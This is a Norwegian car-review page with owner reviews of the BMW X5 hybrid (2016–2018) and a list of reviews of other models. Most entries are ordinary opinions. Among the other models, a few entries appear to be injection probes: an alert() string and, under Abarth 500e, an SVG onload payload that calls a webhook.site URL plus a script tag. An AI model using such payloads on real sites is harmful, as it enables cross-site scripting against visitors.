Vurdert av Maho
Flere vurderinger fra samme generasjon
BMW X5 (2018)
Kort oppsummert: En meget robust bil disse F15 X5’ene. Oppleves som meget trygg og stor kjøreglede under kjøring. Hybrid utgaven kan oppleves som noe tung i svinger, men man da avpasser man fart
BMW X5 (2018)
Var skeptisk til hybrid/bensin patenten kontra diesel men den er utrolig god å kjøre ! Funker så langt meget bra i Oslo vinter temperatur. Må ha H&K lyd. Og så kos med varm bil når man starter
BMW X5 (2017)
Ikke så veldig mange som er som BMW. Hærlig med cruise kontroll som stopper og starter selv, samt køassistent. Komfortsetene er også veldig bra. En hærlig bil, kunne gått litt lengere på ren st
BMW X5 (2017)
En bil med stor kjøreglede. Kvalitet i høysetet. Føler meg veldig trygg i førersetet. Noe høy drivstoff forbruk (snittforbruk. 06.9 - 0,7 liter på mila)
BMW X5 (2017)
Meget godt fornøyd med bilen. Lite feil, relativt ok forbruk i forhold til størrelse. Meget komfortabel.
BMW X5 (2017)
Stor og flott bil med masse sikkerhetsutstyr om du krysser av riktig i utstyrslista. Bruker ikke bensin i byen og ligger på Ca. 0,75 på motorvei/landevei. Etter 13.000 Km. er snittforbruket på 0,5
BMW X5 (2017)
Hadde tidligere samme bil med 211hk diesel. Denne er bedre på alt foruten forbruk ved langkjøring og bagasjeromsplass.
BMW X5 (2017)
Fantastisk kjøremaskin som bare må oppleves. På el- så er det nett som og kjøre romskip. Kombinerer du så har du en sportsuv som drar deg fra 0-100 på 6,8 sek. Fantastisk skyv og forbikjøringe
BMW X5 (2017)
Behagelig og trygg transport . Driftssikker.
BMW X5 (2016)
Fantastisk god bil , eneste minus er kort rekkevidde med ren strøm
BMW X5 (2016)
Dyr og dårlig bil! Har utviklingen av X5 egentlig gått framover siden E70?
BMW X5 (2016)
9.7/10
BMW X5 (2016)
Super komfortabel bil, men lengden på el-kjøring er kortere enn jeg hadde forventet, særlig når det er mindre enn 5gr +. Hybridmodellen gav i allefall en relativt gunstig nybil pris. Har hatt li
BMW X5 (2016)
Speedometer, turteller, tankmåler og alle instrumenter fremfor rattet ble mørkt og ute av drift under kjøring. Må bytte hele innsatsen med instrumenter, garantisak heldigvis.
BMW X5 (2016)
De fleste av denne utgaven er proppet med utstyr. Veldig mye bil for pengene.
Flere vurderinger
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km